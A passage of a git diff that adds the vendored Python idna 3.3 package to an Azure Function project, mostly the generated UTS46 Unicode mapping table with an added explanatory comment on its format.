int]: + return (r >> 32), (r & ((1 << 32) - 1)) + + +def intranges_contain(int_: int, ranges: Tuple[int, ...]) -> bool: + """Determine if `int_` falls into one of the ranges in `ranges`.""" + tuple_ = _encode_range(int_, 0) + pos = bisect.bisect_left(ranges, tuple_) + # we could be immediately ahead of a tuple (start, end) + # with start < int_ <= end + if pos > 0: + left, right = _decode_range(ranges[pos-1]) + if left <= int_ < right: + return True + # or we could be immediately behind a tuple (int_, end) + if pos < len(ranges): + left, _ = _decode_range(ranges[pos]) + if left == int_: + return True + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py new file mode 100644 index 0000000..164ae00 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/package_data.py @@ -0,0 +1,2 @@ +__version__ = '3.3' + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py new file mode 100644 index 0000000..ff69703 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/idna/uts46data.py @@ -0,0 +1,8512 @@ +# This file is automatically generated by tools/idna-data +# vim: set fileencoding=utf-8 : + +from typing import List, Tuple, Union + + +"""IDNA Mapping Table from UTS46.""" + + +__version__ = '14.0.0' +def _seg_0() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x0, '3'), + (0x1, '3'), + (0x2, '3'), + (0x3, '3'), + (0x4, '3'), + (0x5, '3'), + (0x6, '3'), + (0x7, '3'), + (0x8, '3'), + (0x9, '3'), + 
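+ # [Editor's note; annotation, not part of the upstream idna sources] Each
+ # row in these _seg_* tables is (codepoint, status) or (codepoint, status,
+ # mapping) and governs every codepoint from its first field up to, but not
+ # including, the first field of the next row. Statuses: 'V' valid, 'M'
+ # mapped to the third field, 'D' deviation, 'I' ignored, 'X' disallowed,
+ # '3' disallowed when STD3 rules apply (otherwise valid, or mapped when a
+ # third field is present). A minimal lookup sketch, assuming the uts46data
+ # tuple that the generated file assembles from these segments at its end:
+ #   import bisect
+ #   def uts46_row(ch: str):
+ #       cp = ord(ch)
+ #       # 'Z' sorts after every status letter, so bisect_left lands just
+ #       # past the last row whose codepoint is <= cp
+ #       return uts46data[bisect.bisect_left(uts46data, (cp, 'Z')) - 1]
+ #   uts46_row('A')       # (0x41, 'M', 'a'): uppercase ASCII maps to lowercase
+ #   uts46_row('\u00DF')  # (0xDF, 'D', 'ss'): deviation character ß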
(0xA, '3'), + (0xB, '3'), + (0xC, '3'), + (0xD, '3'), + (0xE, '3'), + (0xF, '3'), + (0x10, '3'), + (0x11, '3'), + (0x12, '3'), + (0x13, '3'), + (0x14, '3'), + (0x15, '3'), + (0x16, '3'), + (0x17, '3'), + (0x18, '3'), + (0x19, '3'), + (0x1A, '3'), + (0x1B, '3'), + (0x1C, '3'), + (0x1D, '3'), + (0x1E, '3'), + (0x1F, '3'), + (0x20, '3'), + (0x21, '3'), + (0x22, '3'), + (0x23, '3'), + (0x24, '3'), + (0x25, '3'), + (0x26, '3'), + (0x27, '3'), + (0x28, '3'), + (0x29, '3'), + (0x2A, '3'), + (0x2B, '3'), + (0x2C, '3'), + (0x2D, 'V'), + (0x2E, 'V'), + (0x2F, '3'), + (0x30, 'V'), + (0x31, 'V'), + (0x32, 'V'), + (0x33, 'V'), + (0x34, 'V'), + (0x35, 'V'), + (0x36, 'V'), + (0x37, 'V'), + (0x38, 'V'), + (0x39, 'V'), + (0x3A, '3'), + (0x3B, '3'), + (0x3C, '3'), + (0x3D, '3'), + (0x3E, '3'), + (0x3F, '3'), + (0x40, '3'), + (0x41, 'M', 'a'), + (0x42, 'M', 'b'), + (0x43, 'M', 'c'), + (0x44, 'M', 'd'), + (0x45, 'M', 'e'), + (0x46, 'M', 'f'), + (0x47, 'M', 'g'), + (0x48, 'M', 'h'), + (0x49, 'M', 'i'), + (0x4A, 'M', 'j'), + (0x4B, 'M', 'k'), + (0x4C, 'M', 'l'), + (0x4D, 'M', 'm'), + (0x4E, 'M', 'n'), + (0x4F, 'M', 'o'), + (0x50, 'M', 'p'), + (0x51, 'M', 'q'), + (0x52, 'M', 'r'), + (0x53, 'M', 's'), + (0x54, 'M', 't'), + (0x55, 'M', 'u'), + (0x56, 'M', 'v'), + (0x57, 'M', 'w'), + (0x58, 'M', 'x'), + (0x59, 'M', 'y'), + (0x5A, 'M', 'z'), + (0x5B, '3'), + (0x5C, '3'), + (0x5D, '3'), + (0x5E, '3'), + (0x5F, '3'), + (0x60, '3'), + (0x61, 'V'), + (0x62, 'V'), + (0x63, 'V'), + ] + +def _seg_1() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x64, 'V'), + (0x65, 'V'), + (0x66, 'V'), + (0x67, 'V'), + (0x68, 'V'), + (0x69, 'V'), + (0x6A, 'V'), + (0x6B, 'V'), + (0x6C, 'V'), + (0x6D, 'V'), + (0x6E, 'V'), + (0x6F, 'V'), + (0x70, 'V'), + (0x71, 'V'), + (0x72, 'V'), + (0x73, 'V'), + (0x74, 'V'), + (0x75, 'V'), + (0x76, 'V'), + (0x77, 'V'), + (0x78, 'V'), + (0x79, 'V'), + (0x7A, 'V'), + (0x7B, '3'), + (0x7C, '3'), + (0x7D, '3'), + (0x7E, '3'), + (0x7F, '3'), + (0x80, 'X'), + (0x81, 'X'), + (0x82, 'X'), + (0x83, 'X'), + (0x84, 'X'), + (0x85, 'X'), + (0x86, 'X'), + (0x87, 'X'), + (0x88, 'X'), + (0x89, 'X'), + (0x8A, 'X'), + (0x8B, 'X'), + (0x8C, 'X'), + (0x8D, 'X'), + (0x8E, 'X'), + (0x8F, 'X'), + (0x90, 'X'), + (0x91, 'X'), + (0x92, 'X'), + (0x93, 'X'), + (0x94, 'X'), + (0x95, 'X'), + (0x96, 'X'), + (0x97, 'X'), + (0x98, 'X'), + (0x99, 'X'), + (0x9A, 'X'), + (0x9B, 'X'), + (0x9C, 'X'), + (0x9D, 'X'), + (0x9E, 'X'), + (0x9F, 'X'), + (0xA0, '3', ' '), + (0xA1, 'V'), + (0xA2, 'V'), + (0xA3, 'V'), + (0xA4, 'V'), + (0xA5, 'V'), + (0xA6, 'V'), + (0xA7, 'V'), + (0xA8, '3', ' ̈'), + (0xA9, 'V'), + (0xAA, 'M', 'a'), + (0xAB, 'V'), + (0xAC, 'V'), + (0xAD, 'I'), + (0xAE, 'V'), + (0xAF, '3', ' ̄'), + (0xB0, 'V'), + (0xB1, 'V'), + (0xB2, 'M', '2'), + (0xB3, 'M', '3'), + (0xB4, '3', ' ́'), + (0xB5, 'M', 'μ'), + (0xB6, 'V'), + (0xB7, 'V'), + (0xB8, '3', ' ̧'), + (0xB9, 'M', '1'), + (0xBA, 'M', 'o'), + (0xBB, 'V'), + (0xBC, 'M', '1⁄4'), + (0xBD, 'M', '1⁄2'), + (0xBE, 'M', '3⁄4'), + (0xBF, 'V'), + (0xC0, 'M', 'à'), + (0xC1, 'M', 'á'), + (0xC2, 'M', 'â'), + (0xC3, 'M', 'ã'), + (0xC4, 'M', 'ä'), + (0xC5, 'M', 'å'), + (0xC6, 'M', 'æ'), + (0xC7, 'M', 'ç'), + ] + +def _seg_2() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xC8, 'M', 'è'), + (0xC9, 'M', 'é'), + (0xCA, 'M', 'ê'), + (0xCB, 'M', 'ë'), + (0xCC, 'M', 'ì'), + (0xCD, 'M', 'í'), + (0xCE, 'M', 'î'), + (0xCF, 'M', 'ï'), + (0xD0, 'M', 'ð'), + (0xD1, 'M', 'ñ'), + (0xD2, 'M', 'ò'), + (0xD3, 'M', 'ó'), + (0xD4, 'M', 'ô'), + (0xD5, 'M', 'õ'), + (0xD6, 
'M', 'ö'), + (0xD7, 'V'), + (0xD8, 'M', 'ø'), + (0xD9, 'M', 'ù'), + (0xDA, 'M', 'ú'), + (0xDB, 'M', 'û'), + (0xDC, 'M', 'ü'), + (0xDD, 'M', 'ý'), + (0xDE, 'M', 'þ'), + (0xDF, 'D', 'ss'), + (0xE0, 'V'), + (0xE1, 'V'), + (0xE2, 'V'), + (0xE3, 'V'), + (0xE4, 'V'), + (0xE5, 'V'), + (0xE6, 'V'), + (0xE7, 'V'), + (0xE8, 'V'), + (0xE9, 'V'), + (0xEA, 'V'), + (0xEB, 'V'), + (0xEC, 'V'), + (0xED, 'V'), + (0xEE, 'V'), + (0xEF, 'V'), + (0xF0, 'V'), + (0xF1, 'V'), + (0xF2, 'V'), + (0xF3, 'V'), + (0xF4, 'V'), + (0xF5, 'V'), + (0xF6, 'V'), + (0xF7, 'V'), + (0xF8, 'V'), + (0xF9, 'V'), + (0xFA, 'V'), + (0xFB, 'V'), + (0xFC, 'V'), + (0xFD, 'V'), + (0xFE, 'V'), + (0xFF, 'V'), + (0x100, 'M', 'ā'), + (0x101, 'V'), + (0x102, 'M', 'ă'), + (0x103, 'V'), + (0x104, 'M', 'ą'), + (0x105, 'V'), + (0x106, 'M', 'ć'), + (0x107, 'V'), + (0x108, 'M', 'ĉ'), + (0x109, 'V'), + (0x10A, 'M', 'ċ'), + (0x10B, 'V'), + (0x10C, 'M', 'č'), + (0x10D, 'V'), + (0x10E, 'M', 'ď'), + (0x10F, 'V'), + (0x110, 'M', 'đ'), + (0x111, 'V'), + (0x112, 'M', 'ē'), + (0x113, 'V'), + (0x114, 'M', 'ĕ'), + (0x115, 'V'), + (0x116, 'M', 'ė'), + (0x117, 'V'), + (0x118, 'M', 'ę'), + (0x119, 'V'), + (0x11A, 'M', 'ě'), + (0x11B, 'V'), + (0x11C, 'M', 'ĝ'), + (0x11D, 'V'), + (0x11E, 'M', 'ğ'), + (0x11F, 'V'), + (0x120, 'M', 'ġ'), + (0x121, 'V'), + (0x122, 'M', 'ģ'), + (0x123, 'V'), + (0x124, 'M', 'ĥ'), + (0x125, 'V'), + (0x126, 'M', 'ħ'), + (0x127, 'V'), + (0x128, 'M', 'ĩ'), + (0x129, 'V'), + (0x12A, 'M', 'ī'), + (0x12B, 'V'), + ] + +def _seg_3() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x12C, 'M', 'ĭ'), + (0x12D, 'V'), + (0x12E, 'M', 'į'), + (0x12F, 'V'), + (0x130, 'M', 'i̇'), + (0x131, 'V'), + (0x132, 'M', 'ij'), + (0x134, 'M', 'ĵ'), + (0x135, 'V'), + (0x136, 'M', 'ķ'), + (0x137, 'V'), + (0x139, 'M', 'ĺ'), + (0x13A, 'V'), + (0x13B, 'M', 'ļ'), + (0x13C, 'V'), + (0x13D, 'M', 'ľ'), + (0x13E, 'V'), + (0x13F, 'M', 'l·'), + (0x141, 'M', 'ł'), + (0x142, 'V'), + (0x143, 'M', 'ń'), + (0x144, 'V'), + (0x145, 'M', 'ņ'), + (0x146, 'V'), + (0x147, 'M', 'ň'), + (0x148, 'V'), + (0x149, 'M', 'ʼn'), + (0x14A, 'M', 'ŋ'), + (0x14B, 'V'), + (0x14C, 'M', 'ō'), + (0x14D, 'V'), + (0x14E, 'M', 'ŏ'), + (0x14F, 'V'), + (0x150, 'M', 'ő'), + (0x151, 'V'), + (0x152, 'M', 'œ'), + (0x153, 'V'), + (0x154, 'M', 'ŕ'), + (0x155, 'V'), + (0x156, 'M', 'ŗ'), + (0x157, 'V'), + (0x158, 'M', 'ř'), + (0x159, 'V'), + (0x15A, 'M', 'ś'), + (0x15B, 'V'), + (0x15C, 'M', 'ŝ'), + (0x15D, 'V'), + (0x15E, 'M', 'ş'), + (0x15F, 'V'), + (0x160, 'M', 'š'), + (0x161, 'V'), + (0x162, 'M', 'ţ'), + (0x163, 'V'), + (0x164, 'M', 'ť'), + (0x165, 'V'), + (0x166, 'M', 'ŧ'), + (0x167, 'V'), + (0x168, 'M', 'ũ'), + (0x169, 'V'), + (0x16A, 'M', 'ū'), + (0x16B, 'V'), + (0x16C, 'M', 'ŭ'), + (0x16D, 'V'), + (0x16E, 'M', 'ů'), + (0x16F, 'V'), + (0x170, 'M', 'ű'), + (0x171, 'V'), + (0x172, 'M', 'ų'), + (0x173, 'V'), + (0x174, 'M', 'ŵ'), + (0x175, 'V'), + (0x176, 'M', 'ŷ'), + (0x177, 'V'), + (0x178, 'M', 'ÿ'), + (0x179, 'M', 'ź'), + (0x17A, 'V'), + (0x17B, 'M', 'ż'), + (0x17C, 'V'), + (0x17D, 'M', 'ž'), + (0x17E, 'V'), + (0x17F, 'M', 's'), + (0x180, 'V'), + (0x181, 'M', 'ɓ'), + (0x182, 'M', 'ƃ'), + (0x183, 'V'), + (0x184, 'M', 'ƅ'), + (0x185, 'V'), + (0x186, 'M', 'ɔ'), + (0x187, 'M', 'ƈ'), + (0x188, 'V'), + (0x189, 'M', 'ɖ'), + (0x18A, 'M', 'ɗ'), + (0x18B, 'M', 'ƌ'), + (0x18C, 'V'), + (0x18E, 'M', 'ǝ'), + (0x18F, 'M', 'ə'), + (0x190, 'M', 'ɛ'), + (0x191, 'M', 'ƒ'), + (0x192, 'V'), + (0x193, 'M', 'ɠ'), + ] + +def _seg_4() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x194, 'M', 
'ɣ'), + (0x195, 'V'), + (0x196, 'M', 'ɩ'), + (0x197, 'M', 'ɨ'), + (0x198, 'M', 'ƙ'), + (0x199, 'V'), + (0x19C, 'M', 'ɯ'), + (0x19D, 'M', 'ɲ'), + (0x19E, 'V'), + (0x19F, 'M', 'ɵ'), + (0x1A0, 'M', 'ơ'), + (0x1A1, 'V'), + (0x1A2, 'M', 'ƣ'), + (0x1A3, 'V'), + (0x1A4, 'M', 'ƥ'), + (0x1A5, 'V'), + (0x1A6, 'M', 'ʀ'), + (0x1A7, 'M', 'ƨ'), + (0x1A8, 'V'), + (0x1A9, 'M', 'ʃ'), + (0x1AA, 'V'), + (0x1AC, 'M', 'ƭ'), + (0x1AD, 'V'), + (0x1AE, 'M', 'ʈ'), + (0x1AF, 'M', 'ư'), + (0x1B0, 'V'), + (0x1B1, 'M', 'ʊ'), + (0x1B2, 'M', 'ʋ'), + (0x1B3, 'M', 'ƴ'), + (0x1B4, 'V'), + (0x1B5, 'M', 'ƶ'), + (0x1B6, 'V'), + (0x1B7, 'M', 'ʒ'), + (0x1B8, 'M', 'ƹ'), + (0x1B9, 'V'), + (0x1BC, 'M', 'ƽ'), + (0x1BD, 'V'), + (0x1C4, 'M', 'dž'), + (0x1C7, 'M', 'lj'), + (0x1CA, 'M', 'nj'), + (0x1CD, 'M', 'ǎ'), + (0x1CE, 'V'), + (0x1CF, 'M', 'ǐ'), + (0x1D0, 'V'), + (0x1D1, 'M', 'ǒ'), + (0x1D2, 'V'), + (0x1D3, 'M', 'ǔ'), + (0x1D4, 'V'), + (0x1D5, 'M', 'ǖ'), + (0x1D6, 'V'), + (0x1D7, 'M', 'ǘ'), + (0x1D8, 'V'), + (0x1D9, 'M', 'ǚ'), + (0x1DA, 'V'), + (0x1DB, 'M', 'ǜ'), + (0x1DC, 'V'), + (0x1DE, 'M', 'ǟ'), + (0x1DF, 'V'), + (0x1E0, 'M', 'ǡ'), + (0x1E1, 'V'), + (0x1E2, 'M', 'ǣ'), + (0x1E3, 'V'), + (0x1E4, 'M', 'ǥ'), + (0x1E5, 'V'), + (0x1E6, 'M', 'ǧ'), + (0x1E7, 'V'), + (0x1E8, 'M', 'ǩ'), + (0x1E9, 'V'), + (0x1EA, 'M', 'ǫ'), + (0x1EB, 'V'), + (0x1EC, 'M', 'ǭ'), + (0x1ED, 'V'), + (0x1EE, 'M', 'ǯ'), + (0x1EF, 'V'), + (0x1F1, 'M', 'dz'), + (0x1F4, 'M', 'ǵ'), + (0x1F5, 'V'), + (0x1F6, 'M', 'ƕ'), + (0x1F7, 'M', 'ƿ'), + (0x1F8, 'M', 'ǹ'), + (0x1F9, 'V'), + (0x1FA, 'M', 'ǻ'), + (0x1FB, 'V'), + (0x1FC, 'M', 'ǽ'), + (0x1FD, 'V'), + (0x1FE, 'M', 'ǿ'), + (0x1FF, 'V'), + (0x200, 'M', 'ȁ'), + (0x201, 'V'), + (0x202, 'M', 'ȃ'), + (0x203, 'V'), + (0x204, 'M', 'ȅ'), + (0x205, 'V'), + (0x206, 'M', 'ȇ'), + (0x207, 'V'), + (0x208, 'M', 'ȉ'), + (0x209, 'V'), + (0x20A, 'M', 'ȋ'), + (0x20B, 'V'), + (0x20C, 'M', 'ȍ'), + ] + +def _seg_5() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x20D, 'V'), + (0x20E, 'M', 'ȏ'), + (0x20F, 'V'), + (0x210, 'M', 'ȑ'), + (0x211, 'V'), + (0x212, 'M', 'ȓ'), + (0x213, 'V'), + (0x214, 'M', 'ȕ'), + (0x215, 'V'), + (0x216, 'M', 'ȗ'), + (0x217, 'V'), + (0x218, 'M', 'ș'), + (0x219, 'V'), + (0x21A, 'M', 'ț'), + (0x21B, 'V'), + (0x21C, 'M', 'ȝ'), + (0x21D, 'V'), + (0x21E, 'M', 'ȟ'), + (0x21F, 'V'), + (0x220, 'M', 'ƞ'), + (0x221, 'V'), + (0x222, 'M', 'ȣ'), + (0x223, 'V'), + (0x224, 'M', 'ȥ'), + (0x225, 'V'), + (0x226, 'M', 'ȧ'), + (0x227, 'V'), + (0x228, 'M', 'ȩ'), + (0x229, 'V'), + (0x22A, 'M', 'ȫ'), + (0x22B, 'V'), + (0x22C, 'M', 'ȭ'), + (0x22D, 'V'), + (0x22E, 'M', 'ȯ'), + (0x22F, 'V'), + (0x230, 'M', 'ȱ'), + (0x231, 'V'), + (0x232, 'M', 'ȳ'), + (0x233, 'V'), + (0x23A, 'M', 'ⱥ'), + (0x23B, 'M', 'ȼ'), + (0x23C, 'V'), + (0x23D, 'M', 'ƚ'), + (0x23E, 'M', 'ⱦ'), + (0x23F, 'V'), + (0x241, 'M', 'ɂ'), + (0x242, 'V'), + (0x243, 'M', 'ƀ'), + (0x244, 'M', 'ʉ'), + (0x245, 'M', 'ʌ'), + (0x246, 'M', 'ɇ'), + (0x247, 'V'), + (0x248, 'M', 'ɉ'), + (0x249, 'V'), + (0x24A, 'M', 'ɋ'), + (0x24B, 'V'), + (0x24C, 'M', 'ɍ'), + (0x24D, 'V'), + (0x24E, 'M', 'ɏ'), + (0x24F, 'V'), + (0x2B0, 'M', 'h'), + (0x2B1, 'M', 'ɦ'), + (0x2B2, 'M', 'j'), + (0x2B3, 'M', 'r'), + (0x2B4, 'M', 'ɹ'), + (0x2B5, 'M', 'ɻ'), + (0x2B6, 'M', 'ʁ'), + (0x2B7, 'M', 'w'), + (0x2B8, 'M', 'y'), + (0x2B9, 'V'), + (0x2D8, '3', ' ̆'), + (0x2D9, '3', ' ̇'), + (0x2DA, '3', ' ̊'), + (0x2DB, '3', ' ̨'), + (0x2DC, '3', ' ̃'), + (0x2DD, '3', ' ̋'), + (0x2DE, 'V'), + (0x2E0, 'M', 'ɣ'), + (0x2E1, 'M', 'l'), + (0x2E2, 'M', 's'), + (0x2E3, 'M', 'x'), + (0x2E4, 'M', 'ʕ'), + (0x2E5, 
'V'), + (0x340, 'M', '̀'), + (0x341, 'M', '́'), + (0x342, 'V'), + (0x343, 'M', '̓'), + (0x344, 'M', '̈́'), + (0x345, 'M', 'ι'), + (0x346, 'V'), + (0x34F, 'I'), + (0x350, 'V'), + (0x370, 'M', 'ͱ'), + (0x371, 'V'), + (0x372, 'M', 'ͳ'), + (0x373, 'V'), + (0x374, 'M', 'ʹ'), + (0x375, 'V'), + (0x376, 'M', 'ͷ'), + (0x377, 'V'), + ] + +def _seg_6() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x378, 'X'), + (0x37A, '3', ' ι'), + (0x37B, 'V'), + (0x37E, '3', ';'), + (0x37F, 'M', 'ϳ'), + (0x380, 'X'), + (0x384, '3', ' ́'), + (0x385, '3', ' ̈́'), + (0x386, 'M', 'ά'), + (0x387, 'M', '·'), + (0x388, 'M', 'έ'), + (0x389, 'M', 'ή'), + (0x38A, 'M', 'ί'), + (0x38B, 'X'), + (0x38C, 'M', 'ό'), + (0x38D, 'X'), + (0x38E, 'M', 'ύ'), + (0x38F, 'M', 'ώ'), + (0x390, 'V'), + (0x391, 'M', 'α'), + (0x392, 'M', 'β'), + (0x393, 'M', 'γ'), + (0x394, 'M', 'δ'), + (0x395, 'M', 'ε'), + (0x396, 'M', 'ζ'), + (0x397, 'M', 'η'), + (0x398, 'M', 'θ'), + (0x399, 'M', 'ι'), + (0x39A, 'M', 'κ'), + (0x39B, 'M', 'λ'), + (0x39C, 'M', 'μ'), + (0x39D, 'M', 'ν'), + (0x39E, 'M', 'ξ'), + (0x39F, 'M', 'ο'), + (0x3A0, 'M', 'π'), + (0x3A1, 'M', 'ρ'), + (0x3A2, 'X'), + (0x3A3, 'M', 'σ'), + (0x3A4, 'M', 'τ'), + (0x3A5, 'M', 'υ'), + (0x3A6, 'M', 'φ'), + (0x3A7, 'M', 'χ'), + (0x3A8, 'M', 'ψ'), + (0x3A9, 'M', 'ω'), + (0x3AA, 'M', 'ϊ'), + (0x3AB, 'M', 'ϋ'), + (0x3AC, 'V'), + (0x3C2, 'D', 'σ'), + (0x3C3, 'V'), + (0x3CF, 'M', 'ϗ'), + (0x3D0, 'M', 'β'), + (0x3D1, 'M', 'θ'), + (0x3D2, 'M', 'υ'), + (0x3D3, 'M', 'ύ'), + (0x3D4, 'M', 'ϋ'), + (0x3D5, 'M', 'φ'), + (0x3D6, 'M', 'π'), + (0x3D7, 'V'), + (0x3D8, 'M', 'ϙ'), + (0x3D9, 'V'), + (0x3DA, 'M', 'ϛ'), + (0x3DB, 'V'), + (0x3DC, 'M', 'ϝ'), + (0x3DD, 'V'), + (0x3DE, 'M', 'ϟ'), + (0x3DF, 'V'), + (0x3E0, 'M', 'ϡ'), + (0x3E1, 'V'), + (0x3E2, 'M', 'ϣ'), + (0x3E3, 'V'), + (0x3E4, 'M', 'ϥ'), + (0x3E5, 'V'), + (0x3E6, 'M', 'ϧ'), + (0x3E7, 'V'), + (0x3E8, 'M', 'ϩ'), + (0x3E9, 'V'), + (0x3EA, 'M', 'ϫ'), + (0x3EB, 'V'), + (0x3EC, 'M', 'ϭ'), + (0x3ED, 'V'), + (0x3EE, 'M', 'ϯ'), + (0x3EF, 'V'), + (0x3F0, 'M', 'κ'), + (0x3F1, 'M', 'ρ'), + (0x3F2, 'M', 'σ'), + (0x3F3, 'V'), + (0x3F4, 'M', 'θ'), + (0x3F5, 'M', 'ε'), + (0x3F6, 'V'), + (0x3F7, 'M', 'ϸ'), + (0x3F8, 'V'), + (0x3F9, 'M', 'σ'), + (0x3FA, 'M', 'ϻ'), + (0x3FB, 'V'), + (0x3FD, 'M', 'ͻ'), + (0x3FE, 'M', 'ͼ'), + (0x3FF, 'M', 'ͽ'), + (0x400, 'M', 'ѐ'), + (0x401, 'M', 'ё'), + (0x402, 'M', 'ђ'), + ] + +def _seg_7() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x403, 'M', 'ѓ'), + (0x404, 'M', 'є'), + (0x405, 'M', 'ѕ'), + (0x406, 'M', 'і'), + (0x407, 'M', 'ї'), + (0x408, 'M', 'ј'), + (0x409, 'M', 'љ'), + (0x40A, 'M', 'њ'), + (0x40B, 'M', 'ћ'), + (0x40C, 'M', 'ќ'), + (0x40D, 'M', 'ѝ'), + (0x40E, 'M', 'ў'), + (0x40F, 'M', 'џ'), + (0x410, 'M', 'а'), + (0x411, 'M', 'б'), + (0x412, 'M', 'в'), + (0x413, 'M', 'г'), + (0x414, 'M', 'д'), + (0x415, 'M', 'е'), + (0x416, 'M', 'ж'), + (0x417, 'M', 'з'), + (0x418, 'M', 'и'), + (0x419, 'M', 'й'), + (0x41A, 'M', 'к'), + (0x41B, 'M', 'л'), + (0x41C, 'M', 'м'), + (0x41D, 'M', 'н'), + (0x41E, 'M', 'о'), + (0x41F, 'M', 'п'), + (0x420, 'M', 'р'), + (0x421, 'M', 'с'), + (0x422, 'M', 'т'), + (0x423, 'M', 'у'), + (0x424, 'M', 'ф'), + (0x425, 'M', 'х'), + (0x426, 'M', 'ц'), + (0x427, 'M', 'ч'), + (0x428, 'M', 'ш'), + (0x429, 'M', 'щ'), + (0x42A, 'M', 'ъ'), + (0x42B, 'M', 'ы'), + (0x42C, 'M', 'ь'), + (0x42D, 'M', 'э'), + (0x42E, 'M', 'ю'), + (0x42F, 'M', 'я'), + (0x430, 'V'), + (0x460, 'M', 'ѡ'), + (0x461, 'V'), + (0x462, 'M', 'ѣ'), + (0x463, 'V'), + (0x464, 'M', 'ѥ'), + (0x465, 'V'), + (0x466, 
'M', 'ѧ'), + (0x467, 'V'), + (0x468, 'M', 'ѩ'), + (0x469, 'V'), + (0x46A, 'M', 'ѫ'), + (0x46B, 'V'), + (0x46C, 'M', 'ѭ'), + (0x46D, 'V'), + (0x46E, 'M', 'ѯ'), + (0x46F, 'V'), + (0x470, 'M', 'ѱ'), + (0x471, 'V'), + (0x472, 'M', 'ѳ'), + (0x473, 'V'), + (0x474, 'M', 'ѵ'), + (0x475, 'V'), + (0x476, 'M', 'ѷ'), + (0x477, 'V'), + (0x478, 'M', 'ѹ'), + (0x479, 'V'), + (0x47A, 'M', 'ѻ'), + (0x47B, 'V'), + (0x47C, 'M', 'ѽ'), + (0x47D, 'V'), + (0x47E, 'M', 'ѿ'), + (0x47F, 'V'), + (0x480, 'M', 'ҁ'), + (0x481, 'V'), + (0x48A, 'M', 'ҋ'), + (0x48B, 'V'), + (0x48C, 'M', 'ҍ'), + (0x48D, 'V'), + (0x48E, 'M', 'ҏ'), + (0x48F, 'V'), + (0x490, 'M', 'ґ'), + (0x491, 'V'), + (0x492, 'M', 'ғ'), + (0x493, 'V'), + (0x494, 'M', 'ҕ'), + (0x495, 'V'), + (0x496, 'M', 'җ'), + (0x497, 'V'), + (0x498, 'M', 'ҙ'), + (0x499, 'V'), + (0x49A, 'M', 'қ'), + (0x49B, 'V'), + (0x49C, 'M', 'ҝ'), + (0x49D, 'V'), + ] + +def _seg_8() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0x49E, 'M', 'ҟ'), + (0x49F, 'V'), + (0x4A0, 'M', 'ҡ'), + (0x4A1, 'V'), + (0x4A2, 'M', 'ң'), + (0x4A3, 'V'), + (0x4A4, 'M', 'ҥ'), + (0x4A5, 'V'), + (0x4A6, 'M', 'ҧ'), + (0x4A7, 'V'), + (0x4A8, 'M', 'ҩ'), + (0x4A9, 'V'), + (0x4AA, 'M', 'ҫ'), + (0x4AB, 'V'), + (0x4AC, 'M', 'ҭ'), + (0x4AD, 'V'), + (0x4AE, 'M', 'ү'), + (0x4AF, 'V'), + (0x4B0, 'M', 'ұ'), + (0x4B1, 'V'), + (0x4B2, 'M', 'ҳ'), + (0x4B3, 'V'), + (0x4B4, 'M', 'ҵ'), + (0x4B5, 'V'), + (0x4B6, 'M', 'ҷ'), + (0x4B7, 'V'), + (0x4B8, 'M', 'ҹ'), + (0x4B9, 'V'), + (0x4BA, 'M', 'һ'), + (0x4BB, 'V'), + (0x4BC, 'M', 'ҽ'), + (0x4BD, 'V'), + (0x4BE, 'M', 'ҿ'), + (0x4BF, 'V'), + (0x4C0, 'X'), + (0x4C1, 'M', 'ӂ'), + (0x4C2, 'V'), + (0x4C3, 'M', 'ӄ'), + (0x4C4, 'V'), + (0x4C5, 'M', 'ӆ'), + (0x4C6, 'V'), + (0x4C7, 'M', 'ӈ'), + (0x4C8, 'V'), + (0x4C9, 'M', 'ӊ'), + (0x4CA, 'V'), + (0x4CB, 'M', 'ӌ'), + (0x4CC, 'V'), + (0x4CD, 'M', 'ӎ'), + (0x4CE, 'V'), + (0x4D0, 'M', 'ӑ'), + (0x4D1, 'V'), + (0x4D2, 'M', 'ӓ'), + (0x4D3, 'V'), + (0x4D4, 'M', 'ӕ'), + (0x4D5, 'V'), + (0x4D6, 'M', 'ӗ'), + (0x4D7, 'V'), + (0x4D8, 'M', 'ә'), + (0x4D9, 'V'), + (0x4DA, 'M', 'ӛ'), + (0x4DB, 'V'), + (0x4DC, 'M', 'ӝ'), + (0x4DD, 'V'), + (0x4DE, 'M', 'ӟ'), + (0x4DF, 'V'), + (0x4E0, 'M', 'ӡ'), + (0x4E1, 'V'), + (0x4E2, 'M', 'ӣ'), + (0x4E3, 'V'), + (0x4E4, 'M', 'ӥ'), + (0x4E5, 'V'), + (0x4E6, 'M', 'ӧ'), + (0x4E7, 'V'), + (0x4E8, 'M', 'ө'), + (0x4E9, 'V'), + (0x4EA, 'M', 'ӫ'), + (0x4EB, 'V'), + (0x4EC, 'M', 'ӭ'), + (0x4ED, 'V'), + (0x4EE, 'M', 'ӯ'), + (0x4EF, 'V'), + (0x4F0, 'M', 'ӱ'), + (0x4F1, 'V'), + (0x4F2, 'M', 'ӳ'), + (0x4F3, 'V'), + (0x4F4, 'M', 'ӵ'), + (0x4F5, 'V'), + (0x4F6, 'M', 'ӷ'), + (0x4F7, 'V'), + (0x4F8, 'M', 'ӹ'), + (0x4F9, 'V'), + (0x4FA, 'M', 'ӻ'), + (0x4FB, 'V'), + (0x4FC, 'M', 'ӽ'), + (0x4FD, 'V'), + (0x4FE, 'M', 'ӿ'), + (0x4FF, 'V'), + (0x500, 'M', 'ԁ'), 